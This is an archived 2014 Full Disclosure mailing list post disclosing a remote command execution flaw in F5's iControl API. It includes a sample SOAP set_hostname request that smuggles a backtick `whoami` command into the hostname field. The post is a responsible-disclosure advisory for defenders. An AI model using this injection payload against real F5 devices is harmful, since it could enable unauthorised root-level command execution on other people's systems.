Full Disclosure mailing list archives
Moar F5 fun in iControl API
From: Brandon Perry <bperry.volatile () gmail com>
Date: Wed, 07 May 2014 17:43:55 -0500
Hi, Linked below is an advisory regarding remote command execution (as root, possibly) vulnerabilities within the iControl API: http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html An example request that will set the hostname to 'root.example.com': <?xml version="1.0" encoding="ISO-8859-1"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Body> <n1:set_hostname xmlns:n1="urn:iControl:System/Inet"> <hostname>`whoami`.example.com</hostname> </n1:set_hostname> </SOAP-ENV:Body> </SOAP-ENV:Envelope> This was responsibly disclosed to F5 on the 7th of February. If you would like the full communication timeline, feel free to ask. _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Moar F5 fun in iControl API Brandon Perry (May 07)